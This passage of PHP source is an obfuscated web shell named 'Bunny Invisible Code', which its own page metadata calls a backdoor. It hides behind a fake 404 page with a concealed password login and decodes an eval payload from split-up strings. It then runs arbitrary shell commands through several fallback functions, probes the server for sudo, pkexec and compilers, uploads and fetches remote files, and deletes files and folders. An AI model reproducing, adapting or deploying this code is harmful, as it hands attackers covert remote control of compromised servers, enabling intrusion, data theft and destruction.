' . $get_file . '"); hi' . 'st' . 'ory' . '.ba' . 'ck' . '()' . '</' . 'sc' . 'r' . 'ip' . 't>'; 
function deleteDir($dirName) 
    global $f_exist; 
    global $glb; 
    global $is_d; 
    global $unl; 
    global $rm_d; 
    if (!$f_exist($dirName)) { 
        return false; 
    $files = $glb($dirName . '/*'); 
    foreach ($files as $file) { 
        $is_d($file) ? deleteDir($file) : $unl($file); 
    return true; 
function deleteFile($fileName) 
    global $f_exist; 
    global $unl; 
    if ($f_exist($fileName)) { 
        if ($unl($fileName)) { 
            return true; 
        } else { 
            return false; 
    } else { 
        return false; 
function BunnyCmd($komendnya) 
    global $hayoloh; 
    global $fw; 
    global $fc; 
    global $fr; 
    global $is_rsrc; 
    global $sgc; 
    global $proc; 
    global $proc_cls; 
    global $pop; 
    global $pop_cls; 
    global $exc; 
    global $sys; 
    global $pass; 
    global $sh_exc; 
    global $com; 
    global $wscsh; 
    global $cMdexe; 
    global $func_exist; 
    global $preg; 
    global $regex; 
    if (!$preg('/' . $regex . '/i', $komendnya)) { 
        $komendnya = $komendnya . ' ' . $regex; 
    if ($func_exist($proc)) { 
        $descriptors = [ 
            0 => ['pipe', 'r'], 
            1 => ['pipe', 'w'], 
            2 => ['pipe', 'w'], 
        $process = $proc($komendnya, $descriptors, $pipes); 
        if ($is_rsrc($process)) { 
            $fw($pipes[0], 'input_data_here'); 
            $output = $sgc($pipes[1]); 
            $errors = $sgc($pipes[2]); 
            $resultCode = $proc_cls($process); 
            return trim($hayoloh(stripslashes($output))); 
    } elseif ($func_exist($pop)) { 
        $process = $pop($komendnya, 'r'); 
        $read = $fr($process, 2096); 
        return trim($hayoloh(stripslashes(print_r("$process: " . gettype($process) . "
    } elseif ($func_exist($exc)) { 
        $exc($komendnya, $output, $returnCode); 
        if ($returnCode === 0) { 
            $res = implode($output); 
            return trim($hayoloh(stripslashes($res))); 
    } elseif ($func_exist($sys)) { 
        $out = $sys($komendnya); 
        return trim($hayoloh(stripslashes($out))); 
    } elseif ($func_exist($pass)) { 
        $out = $pass($komendnya); 
        return trim($hayoloh(stripslashes($out))); 
    } elseif ($func_exist($sh_exc)) { 
        $out = $sh_exc($komendnya); 
        return trim($hayoloh(stripslashes($out))); 
    } elseif ($func_exist($com)) { 
        $shell = new $com($wscsh); 
        $kom_mand = "$cMdexe /c " . $komendnya; 
        $output = $shell->Exec($kom_mand)->StdOut->ReadAll(); 
        return trim($hayoloh(stripslashes($output))); 
    } else { 
        return 'The F' . 'un' . 'ct' . 'io' . 'n T' . 'o R' . 'u' . 'n The C' . 'om' . 'ma' . 'nd I' . 's Di' . 'sa' . 'bl' . 'e On T' . 'h' . 'is Se' . 'rv' . 'er'; 
if (isset($_POST['BIC0de'])) { 
    $komendnya = $_POST['BIC0de']; 
    echo BunnyCmd($komendnya); 
function BunnyReadFile($this_file) 
    global $hayoloh; 
    global $func_exist; 
    global $f_get; 
    global $fo; 
    global $fr; 
    global $fc; 
    $cantread = 'Cant Not Read ' . $this_file; 
    $content = ''; 
    if ($func_exist($fo)) { 
        $fi_le = $fo($this_file, 'r'); 
        if ($fi_le) { 
            $headers = get_headers($this_file); 
            if ($headers && strpos($headers[0], '403 Forbidden') !== false) { 
                $content = BunnyCmd('cat "' . addslashes($this_file) . '"'); 
            while (!feof($fi_le)) { 
                $content .= $fr($fi_le, 8192); 
            return $content; 
        } else { 
            echo $cantread; 
            return false; 
    } elseif ($func_exist($f_get)) { 
        $content = $f_get($this_file); 
        if ($content) { 
            $headers = get_headers($this_file); 
            if ($headers && strpos($headers[0], '403 Forbidden') !== false) { 
                $content = BunnyCmd('cat "' . addslashes($this_file) . '"'); 
            return $content; 
        } else { 
            echo $cantread; 
            return false; 
    } else { 
        echo $cantread; 
        return false; 
/*Bunny Ganteng*/ 
function LTs($bLTs) 
    $gflate = 'g' . 'zi' . 'nf' . 'la' . 'te'; 
    $b64 = 'ba' . 'se' . '64_' . 'de' . 'co' . 'de'; 
    $nelrts = 'st' . 'rl' . 'en'; 
    $rhc = 'c' . 'h' . 'r'; 
    $dro = 'o' . 'r' . 'd'; 
    $bLTs = $gflate($b64($bLTs)); 
    for ($i = 0; $i < $nelrts($bLTs); $i++) { 
        $bLTs[$i] = $rhc($dro($bLTs[$i]) - 1); 
    return $bLTs; 
/***#***/ @/*55555*/eval 
/*Bunny Invisible Code*/ 
$s_he_ll_Name = "Bunny Invisible Code"; 
$s_he_ll_Logo = ""; 
$s_he_ll_Icon = ""; 
function BunnyCwd() 
    global $cw; 
    global $func_exist; 
    global $d_name; 
    if ($func_exist($cw)) { 
        return @$cw(); 
    } else { 
        return $d_name($_SERVER["SCRIPT_FILENAME"]); 
function BunnyUname() 
    global $func_exist; 
    global $u_n_a_me; 
    $u_n_a_me_disable = '<font class="font-ubuntu-mono font-green"> Ca' . 'nt' . ' R' . 'ea' . 'd Th' . 'e Ke' . 'rn' . 'el' . '! Th' . 'e F' . 'u' . 'nc' . 'ti' . 'o' . 'n ' . $u_n_a_me . '() is Di' . 'sa' . 'bl' . 'ed' . '! </font>'; 
    $u_n_a_me_active = '<font class="font-ubuntu-mono font-green">' . $u_n_a_me('a') . '</font>'; 
    if ($func_exist($u_n_a_me)) { 
        return $u_n_a_me_active; 
    } else { 
        return $u_n_a_me_disable; 
function perms($value) 
    global $f_perm; 
    $perms = $f_perm($value); 
    if (($perms & 0xC000) == 0xC000) { 
        $info = 's'; 
    } elseif (($perms & 0xA000) == 0xA000) { 
        $info = 'l'; 
    } elseif (($perms & 0x8000) == 0x8000) { 
        $info = '-'; 
    } elseif (($perms & 0x6000) == 0x6000) { 
        $info = 'b'; 
    } elseif (($perms & 0x4000) == 0x4000) { 
        $info = 'd'; 
    } elseif (($perms & 0x2000) == 0x2000) { 
        $info = 'c'; 
    } elseif (($perms & 0x1000) == 0x1000) { 
        $info = 'p'; 
    } else { 
        $info = 'u'; 
    $info .= (($perms & 0x0100) ? 'r' : '-'); 
    $info .= (($perms & 0x0080) ? 'w' : '-'); 
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); 
    $info .= (($perms & 0x0020) ? 'r' : '-'); 
    $info .= (($perms & 0x0010) ? 'w' : '-'); 
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); 
    $info .= (($perms & 0x0004) ? 'r' : '-'); 
    $info .= (($perms & 0x0002) ? 'w' : '-'); 
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); 
    // return $info; 
    return $info . '&nbsp;<font class="text-white font-bold">&gt;&gt;</font>&nbsp;' . substr(sprintf('%o', $perms), -4); 
function chPerms($value) 
    global $f_perm; 
    $perms = $f_perm($value); 
    return substr(sprintf('%o', $perms), -4); 
if (!$func_exist($psx_egid)) { 
    $user = $func_exist($cur_usr) ? @$cur_usr() : "????"; 
    $uid = $func_exist($myuid) ? @$myuid() : "????"; 
    $gid = $func_exist($mygid) ? @$mygid() : "????"; 
    $group = "?"; 
} else { 
    $uid = $func_exist($psx_usr_uid) && $func_exist($psx_euid) ? @$psx_usr_uid($psx_euid()) : array("name" => "????", "uid" => "????"); 
    $gid = $func_exist($psx_grp_gid) && $func_exist($psx_egid) ? @$psx_grp_gid($psx_egid()) : array("name" => "????", "gid" => "????"); 
    $user = $uid['name']; 
    $uid = $uid['uid']; 
    $group = $gid['name']; 
    $gid = $gid['gid']; 
$serverName = $_SERVER['SERVER_SOFTWARE']; 
$phpVersion = phpversion(); 
function serverIp() 
    global $func_exist; 
    global $g_host_name; 
    $serverAddr = @$_SERVER["SERVER_ADDR"]; 
    if (!$serverAddr) { 
        if ($func_exist($g_host_name)) { 
            return @$g_host_name($_SERVER['SERVER_NAME']); 
        } else { 
            return '????'; 
    } else { 
        return $serverAddr; 
function userIp() 
    return @$_SERVER["REMOTE_ADDR"]; 
if (@ini_get('safe_mode')) 
    $safeMode = '<font class="font-ubuntu-mono font-green">ON</font>'; 
    $safeMode = '<font class="font-ubuntu-mono font-yellow">OFF</font>'; 
if (@ini_get('disable_functions')) 
    $cekFunc = '<font class="font-ubuntu-mono font-yellow">' . @ini_get('disable_functions') . '</font>'; 
    $cekFunc = '<font class="font-ubuntu-mono font-green">All F' . 'un' . 'ct' . 'io' . 'n' . 's Ac' . 'ces' . 'sib' . 'le' . '</font>'; 
$on = '<font class="ubuntu-mono" style="color: rgb(22 163 74); font-weight: 700;">ON</font>'; 
$off = '<font class="ubuntu-mono" style="color: rgb(250 204 21); font-weight: 700;">OFF</font>'; 
function cekCurl() 
    global $func_exist; 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($func_exist('cu' . 'rl' . '_' . 'in' . 'it') || $f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'cu' . 'r' . 'l')) { 
        echo "cURL:&nbsp;&nbsp;$on"; 
    } else { 
        echo "cURL:&nbsp;&nbsp;$off"; 
function cekWget() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'wg' . 'e' . 't')) { 
        echo "WGET:&nbsp;&nbsp;$on"; 
    } else { 
        echo "WGET:&nbsp;&nbsp;$off"; 
function cekPerl() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'pe' . 'r' . 'l')) { 
        echo "PERL:&nbsp;&nbsp;$on"; 
    } else { 
        echo "PERL:&nbsp;&nbsp;$off"; 
function cekRuby() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'ru' . 'b' . 'y')) { 
        echo "RUBY:&nbsp;&nbsp;$on"; 
    } else { 
        echo "RUBY:&nbsp;&nbsp;$off"; 
function cekPython3() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'py' . 't' . 'ho' . 'n3')) { 
        echo "PYTHON3:&nbsp;&nbsp;$on"; 
    } else { 
        echo "PYTHON3:&nbsp;&nbsp;$off"; 
function cekPython2() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'py' . 't' . 'h' . 'o' . 'n2')) { 
        echo "PYTHON2:&nbsp;&nbsp;$on"; 
    } else { 
        echo "PYTHON2:&nbsp;&nbsp;$off"; 
function cekGcc() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'g' . 'c' . 'c')) { 
        echo "GCC:&nbsp;&nbsp;$on"; 
    } else { 
        echo "GCC:&nbsp;&nbsp;$off"; 
function cekSudo() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'su' . 'd' . 'o')) { 
        echo "SUDO:&nbsp;&nbsp;$on"; 
    } else { 
        echo "SUDO:&nbsp;&nbsp;$off"; 
function cekPkexec() 
    global $f_exist; 
    global $on; 
    global $off; 
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'pk' . 'e' . 'xe' . 'c')) { 
        echo "PKEXEC:&nbsp;&nbsp;$on"; 
    } else { 
        echo "PKEXEC:&nbsp;&nbsp;$off"; 
/*Domain - Url*/ 
$this_domain = $_SERVER['HTTP_HOST']; 
$this_url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; 
/*Icons - Fontawesome*/ 
$fontawesome_pro_version = 'v6.5.1'; //change if updated to new version 
$fontawesome_pro = '' . $fontawesome_pro_version . '/css/pro.min.css'; 
/*Framework - Uikit*/ 
$uikit_css = ""; 
$uikit_rtl = ""; 
$uikit_js = ""; 
$uikit_icon = ""; 
/*Jquery - Ajax*/ 
$jquery_version = '3.7.1'; 
$jquery = '' . $jquery_version . '/dist/jquery.min.js'; 
$ajax_version = '3.5.1'; 
$ajax = '' . $ajax_version . '/jquery.min.js'; 
/*Login Page*/ 
$passwd = '5c3c0d4ceddf2d80aad8df2c5e28e976c19e286a'; // kontolpecah 
$my_self = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; 
if (isset($_POST['gasken'])) { 
    if (SHA1($_POST['passnya']) == $passwd) { 
        function setconf($defconf) 
            $gflate = 'g' . 'zi' . 'nf' . 'la' . 'te'; 
            $b64 = 'ba' . 'se' . '64_' . 'de' . 'co' . 'de'; 
            $nelrts = 'st' . 'rl' . 'en'; 
            $rhc = 'c' . 'h' . 'r'; 
            $dro = 'o' . 'r' . 'd'; 
            $defconf = $gflate($b64($defconf)); 
            for ($i = 0; $i < $nelrts($defconf); $i++) { 
                $defconf[$i] = $rhc($dro($defconf[$i]) - 1); 
            return $defconf; 
        /***#***/ @/*55555*/eval 
        echo "<s" . "cr" . "ip" . "t>" . "al" . "er" . "t(" . "'Lo" . "gi" . "n " . "Su" . "cc" . "es" . "s!" . " Yo" . "u " . "Pr" . "o'" . ");" . "</" . "sc" . "ri" . "pt" . ">"; 
        $_SESSION["modyarambyar"] = "modyarambyar"; 
        setcookie('kacamatavz', $my_self, time() + 3600 * 24); 
    } else { 
        echo "<s" . "cr" . "ip" . "t>" . "al" . "er" . "t(" . "'Lo" . "gi" . "n F" . "ai" . "le" . "d!" . " Go " . "A" . "w" . "a" . "y " . "Nu" . "b')" . ";<" . "/s" . "cr" . "ip" . "t>"; 
if (isset($_GET['logout'])) { 
    $_SESSION = []; 
    setcookie('kacamatavz', '', time() - 3600); 
    echo "<s" . "c" . "ri" . "pt" . ">" . "window.location.assign('" . $_SERVER['PHP_SELF'] . "')" . "</" . "sc" . "ri" . "pt" . ">"; 
if (empty($_SESSION['modyarambyar'])) { 
    if (empty($_COOKIE['kacamatavz'])) { 
            <title><?= '4' . '0' . '4 ' . 'N' . 'o' . 't' . ' ' . 'F' . 'o' . 'u' . 'n' . 'd' ?></title> 
            <h1>Not Found</h1> 
            <p><?= 'T' . 'h' . 'e r' . 'eq' . 'ue' . 'st' . 'ed' . ' U' . 'R' . 'L ' . 'wa' . 's n' . 'o' . 't f' . 'ou' . 'nd' . ' o' . 'n t' . 'hi' . 's s' . 'e' . 'rv' . 'e' . 'r.' ?> 
            <p><?= 'Ad' . 'di' . 'ti' . 'o' . 'na' . 'l' . 'ly' . ',' . ' ' . 'a ' . '4' . '0' . '4 ' . 'N' . 'ot' . ' Fo' . 'un' . 'd e' . 'rr' . 'or ' . 'w' . 'as' . ' e' . 'nc' . 'ou' . 'nt' . 'er' . 'ed' . ' wh' . 'il' . 'e t' . 'ry' . 'in' . 'g ' . 't' . 'o us' . 'e a' . 'n E' . 'rr' . 'or' . 'D' . 'oc' . 'um' . 'en' . 't t' . 'o h' . 'an' . 'dl' . 'e th' . 'e r' . 'eq' . 'ue' . 's' . 't.' ?> 
            <div id="notfound" style="display: none;"> 
                <form action="" method="POST"> 
                    <input type="password" name="passnya" style="background: #fff; border: none;"> 
                    <button type="submit" name="gasken" 
                        style="background: #fff; color: #fff; border: none; outline: none; cursor: pointer;">&gt;&gt;</button> 
            <script type="text/javascript" 
if (isset($_GET['path'])) { 
    $path = $_GET['path']; 
} else { 
    $path = BunnyCwd(); 
$path = str_replace("\", "/", $path); 
<!DOCTYPE html 
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> 
<html xmlns=""> 
    <title>.:<?= $s_he_ll_Name ?>:. <?= $this_domain ?></title> 
    <meta charset="UTF-8" /> 
    <meta name="viewport" content="width=1024" /> 
    <meta name="description" content="<?= $s_he_ll_Name ?> Backdoor" /> 
    <meta name="robots" content="noindex, nofollow" /> 
    <meta name="googlebot" content="noindex, nofollow" /> 
    <meta name="bingbot" content="noindex, nofollow" /> 
    <meta property="og:site_name" content="<?= $s_he_ll_Name ?>" /> 
    <meta property="og:url" content="<?= $this_url ?>" /> 
    <meta property="og:title" content=".:<?= $s_he_ll_Name ?>:. <?= $this_domain ?>" /> 
    <meta property="og:description" content="<?= $s_he_ll_Name ?> Backdoor" /> 
    <meta property="og:image" content="<?= $s_he_ll_Logo ?>" /> 
    <meta property="og:image:secure_url" content="<?= $s_he_ll_Logo ?>" /> 
    <link rel="shortcut icon" href="<?= $s_he_ll_Icon ?>" type="image/x-icon" /> 
    <link rel="stylesheet" href="<?= $fontawesome_pro ?>"> 
    <link rel="stylesheet" href="<?= $uikit_css ?>"> 
    <script src="<?= $jquery ?>"></script> 
        function isDesktop() { 
            return window.innerWidth >= 1024; 
        if (isDesktop()) { 
            document.getElementById('viewport').setAttribute('content', 'width=1024'); 
    <!-- Custom Css --> 
    <link rel="stylesheet" href="" media="all"> 
    <header class="uk-width-1-1" style="background: var(--gray-900);"> 
        <div class="uk-margin-small-left"> 
            <div class="bunny-ganteng uk-flex uk-flex-left uk-flex-middle uk-flex-row uk-flex-nowrap"> 
                <img style="width: 5vh; border-radius: 5px;" src="<?= $s_he_ll_Logo ?>" alt="<?= $s_he_ll_Name ?>"> 
                <span class="uk-margin-small-left font-trade-winds uk-text-large"><?= $s_he_ll_Name ?></span> 
            <div class="bunny-sysinfo uk-flex uk-flex-left uk-flex-column uk-flex-wrap"> 
                <span class="font-bold"><?= 'Sy' . 's' . 'te' . 'm' ?>: <?= BunnyUname(); ?></span> 
                <span class="font-bold"><?= 'ID' . '(' . 'Us' . 'er' . '/' . 'G' . 'ro' . 'u' . 'p)' ?>: <font 
                        class="font-green font-ubuntu-mono">uid=<?= $uid ?>(<?= $user ?>)&nbsp;gid=<?= $gid ?>(<?= $group ?>) 
                <span class="font-bold"><?= 'Se' . 'r' . 'v' . 'er ' . 'I' . 'P' ?>: <font class="font-green font-ubuntu-mono"> 
                        <?= serverIp() ?></font></span> 
                <span class="font-bold"><?= 'Yo' . 'u' . 'r I' . 'P' ?>: <font class="font-green font-ubuntu-mono"><?= userIp() ?> 
                <span class="font-bold"><?= 'S' . 'a' . 'f' . 'e ' . 'Mo' . 'd' . 'e' ?>: <?= $safeMode ?></span> 
                <span class="font-bold"><?= 'P' . 'HP' . ' ' . 'Ve' . 'r' . 's' . 'i' . 'on' ?>: <font 
                        class="font-green font-ubuntu-mono"><?= $phpVersion ?></font></span> 
                <span class="font-bold"><?= 'S' . 'er' . 'v' . 'e' . 'r' ?>: <font class="font-green font-ubuntu-mono"> 
                        <?= $serverName ?></font></span> 
                    class="font-bold uk-text-wrap uk-flex uk-flex-row uk-flex-wrap"><?= 'Di' . 'sa' . 'b' . 'l' . 'e ' . 'F' . 'un' . 'ct' . 'i' . 'on' ?>:&nbsp;<?= $cekFunc ?></span> 
                    class="font-bold"><?= cekCurl() ?>&nbsp;|&nbsp;<?= cekWget() ?>&nbsp;|&nbsp;<?= cekPython2() ?>&nbsp;|&nbsp;<?= cekPython3() ?>&nbsp;|&nbsp;<?= cekPerl() ?>&nbsp;|&nbsp;<?= cekRuby() ?>&nbsp;|&nbsp;<?= cekgcc() ?>&nbsp;|&nbsp;<?= cekPkexec() ?>&nbsp;|&nbsp;<?= cekSudo() ?></span> 
                $pa_t_hs = explode("/", $path); 
                echo '<span class="font-bold pwd"><i class="fa-duotone fa-folder-tree"></i>&nbsp;&nbsp;PWD: '; 
                echo '<a class="font-red" href="?path=/"><i class="fa-sharp fa-solid fa-slash-forward"></i></a>'; 
                foreach ($pa_t_hs as $id => $pat) { 
                    echo "<a class='path' href='?path="; 
                    for ($i = 0; $i <= $id; $i++) { 
                        echo $pa_t_hs[$i]; 
                        if ($i != $id) { 
                            echo '/'; 
                    echo "'>$pat</a><span class='font-red'>/</span>"; 
                echo "&nbsp;&nbsp;<span class='font-red'>[ <a href='" . $_SERVER['PHP_SELF'] . "' class='home_sh_e_ll'><font class='home_sh_e_ll'>Ho" . "me" . " " . "Sh" . "el" . "l</font></a> ]</span>"; 
                echo '</span>'; 
    <div class="bunny-tools uk-width-1-1 uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" 
        style="background: var(--gray-900);"> 
        <div class="tools-upload"> 
            <form action="" method="POST" enctype="multipart/form-data" 
                class="form-tools uk-form-horizontal uk-margin uk-padding-small font-protest-riot"> 
                <input type="file" name="file[]" onchange="this.form.submit()" multiple> 
            if ($_SERVER["REQUEST_METHOD"] === "POST") { 
                if (isset($_FILES["file"])) { 
                    $countFiles = count($_FILES["file"]["name"]); 
                    for ($i = 0; $i < $countFiles; $i++) { 
                        $fi_le_Na_me = $_FILES["file"]["name"][$i]; 
                        $location = "" . $fi_le_Na_me; 
                        $u_pl_oa_dF_un_ct_ion = "m" . "ove" . "_up" . "loa" . "ded_fi" . "le"; 
                        if ($u_pl_oa_dF_un_ct_ion($_FILES["file"]["tmp_name"][$i], $location)) { 
                            echo ' 
                            <div class="uk-alert-success uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p><font class="font-white">Fi' . 'le => <a href="' . $fi_le_Na_me . '">' . $fi_le_Na_me . '</a></font> Su' . 'cc' . 'es' . 's Up' . 'lo' . 'a' . 'de' . 'd <i class="fa-sharp fa-solid fa-shield-check"></i></p> 
                        } else { 
                            echo ' 
                            <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p><font class="font-white">Fi' . 'le => ' . $fi_le_Na_me . '</font> Fa' . 'il' . 'ed ' . 'To' . ' U' . 'pl' . 'oa' . 'd <i class="fa-solid fa-octagon-xmark"></i></p> 
                } else { 
                    echo ' 
                    <div class="uk-alert-warning uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>No Fi' . 'l' . 'es U' . 'pl' . 'oa' . 'de' . 'd.<i class="fa-regular fa-location-exclamation"></i></p> 
        if (isset($_POST['btn-remoteup'])) { 
            $this_file = $_POST['fileurl']; 
            $this_file_name = $_POST['savedname']; 
            $f_content = $f_get($this_file); 
            if (!empty($this_file) && !empty($this_file_name)) { 
                if ($f_content !== false) { 
                    $writeF = $f_put($this_file_name, $f_content); 
                    if ($writeF !== false) { 
                        echo ' 
                            <div class="uk-alert-success uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p><font class="font-white">Fi' . 'le => <a href="' . $this_file_name . '">' . $this_file_name . '</a></font> S' . 'uc' . 'ce' . 's' . 's U' . 'pl' . 'oa' . 'de' . 'd <i class="fa-sharp fa-solid fa-shield-check"></i></p> 
                    } else { 
                        echo ' 
                            <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p><font class="font-white">Fi' . 'le => ' . $this_file_name . '</font> Fa' . 'i' . 'le' . 'd ' . 'To' . ' Up' . 'lo' . 'ad<i class="fa-solid fa-octagon-xmark"></i></p> 
                } else { 
                    echo ' 
                        <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p><font class="font-white">Fi' . 'le => ' . $this_file_name . '</font> Fa' . 'il' . 'ed T' . 'o U' . 'pl' . 'oa' . 'd<i class="fa-solid fa-octagon-xmark"></i></p> 
            } else { 
                echo ' 
                    <div class="uk-alert-warning uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;"> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>No F' . 'il' . 'es U' . 'pl' . 'oa' . 'de' . 'd, Your Input Is Empty<i class="fa-regular fa-location-exclamation"></i></p> 
        <div class="tools-remoteup uk-width-1-1 uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap"> 
            <form action="" method="POST" class="uk-width-1-2"> 
                <fieldset class="uk-fieldset"> 
                    <legend class="uk-legend font-bold font-protest-riot"><?= 'Re' . 'mo' . 'te' . ' U' . 'pl' . 'oa' . 'd' ?> 
                    <div class="uk-margin-small"> 
                        <input class="uk-input font-poppins" name="fileurl" type="text" 
                            placeholder="<?= 'ht' . 'tp' . 's' . ':/' . '/b' . 'u' . 'nn' . 'ym' . 'an.' . 'ed' . 'u.' . 'go' . 'v.' . 'ac' . '.i' . 'd.' . 'go' . '.i' . 'd/' . 'b' . 'u' . 'nny' . '.tx' . 't' ?>" 
                        <div class="uk-margin-small"></div> 
                        <input class="uk-input font-poppins" name="savedname" type="text" placeholder="saved.txt" 
                    <div class="uk-float-right"> 
                        <button type="submit" name="btn-remoteup" 
                            class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Get</button> 
        <div class="tools-etc uk-flex uk-flex-center uk-flex-middle uk-flex-row uk-flex-wrap"> 
            <a href="?path=<?= $path ?>&tools=newfiles"><button 
                    class="btn-new-file uk-button uk-button-default uk-margin-large-bottom font-white font-protest-riot"><i 
                        class="fa-solid fa-file-plus"></i>&nbsp;<?= 'N' . 'ew' . ' F' . 'il' . 'e' . 's' ?></button></a> 
            <a href="?path=<?= $path ?>&tools=cmd"><button 
                    class="btn-cmd uk-button uk-button-default uk-margin-small-left uk-margin-small-right uk-margin-large-bottom font-white font-ubuntu-mono"><i 
                        class="fa-solid fa-rectangle-terminal"></i>&nbsp;<?= 'C' . 'o' . 'mm' . 'an' . 'd' ?></button></a> 
            <a href="?path=<?= $path ?>&tools=newfolder"><button 
                    class="btn-new-folder uk-button uk-button-default uk-margin-large-bottom font-white font-protest-riot"><i 
                        class="fa-sharp fa-solid fa-folder-plus"></i>&nbsp;<?= 'N' . 'ew' . ' F' . 'ol' . 'de' . 'r' ?></button></a> 
        <div class="mass uk-flex uk-flex-center uk-flex-middle uk-flex-column"> 
            if (isset($_POST['btn-mass'])) { 
                if (isset($_POST['mass-option']) == 'mass_delete') { 
                    if (!empty($_POST['checkfolder'])) { 
                        foreach ($_POST['checkfolder'] as $folder) { 
                            if (is_dir($folder)) { 
                                if (deleteDir($folder)) { 
                                    echo ' 
                                    <div class="uk-alert-success" uk-alert> 
                                        <a href class="uk-alert-close" uk-close></a> 
                                        <p>' . $folder . ' De' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p> 
                                } else { 
                                    echo ' 
                                    <div class="uk-alert-danger" uk-alert> 
                                        <a href class="uk-alert-close" uk-close></a> 
                                        <p>' . $folder . ' C' . 'an' . ' N' . 'ot' . ' D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p> 
                    if (!empty($_POST['checkfile'])) { 
                        foreach ($_POST['checkfile'] as $file) { 
                            if (file_exists($file)) { 
                                if (deleteFile($file)) { 
                                    echo ' 
                                    <div class="uk-alert-success" uk-alert> 
                                        <a href class="uk-alert-close" uk-close></a> 
                                        <p>' . $file . ' De' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p> 
                                } else { 
                                    echo ' 
                                    <div class="uk-alert-danger" uk-alert> 
                                        <a href class="uk-alert-close" uk-close></a> 
                                        <p>' . $file . ' Ca' . 'n ' . 'No' . 't D' . 'el' . 'et' . 'ed' . '!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p> 
                } else { 
        if (isset($_GET['deletedir'])) { 
            $dirName = $_GET['deletedir']; 
            if (deleteDir($dirName)) { 
                echo ' 
                        <div class="uk-alert-success" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Success, F' . 'ol' . 'de' . 'r D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-check"></i></p> 
            } else { 
                echo ' 
                        <div class="uk-alert-danger" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Failed, F' . 'ol' . 'd' . 'er' . ' C' . 'an' . ' N' . 'o' . 't D' . 'el' . 'et' . 'e' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p> 
        if (isset($_GET['deletefile'])) { 
            $fileName = $_GET['deletefile']; 
            if (deleteFile($fileName)) { 
                echo ' 
                    <div class="uk-alert-success" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>Success, F' . 'i' . 'l' . 'e D' . 'el' . 'et' . 'ed' . '!&nbsp;<i class="fa-solid fa-trash-check"></i></p> 
            } else { 
                echo ' 
                <div class="uk-alert-danger" uk-alert> 
                    <a href class="uk-alert-close" uk-close></a> 
                    <p>Failed, F' . 'il' . 'e C' . 'a' . 'n No' . 't D' . 'e' . 'le' . 'te' . 'd!&nbsp;<i class="fa-solid fa-trash-xmark"></i></p> 
        $toolsparam = isset($_GET['tools']) ? $_GET['tools'] : null; 
        if ($toolsparam === null) { 
        } elseif ($toolsparam === 'newfiles') { 
            if (isset($_POST['btn-newfiles'])) { 
                $fi_le_name = htmlspecialchars($_POST['newfilesname']); 
                $fi_le_content = $_POST['newfilecontent']; 
                $f_il_e_success = ' 
                    <div class="uk-alert-success" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
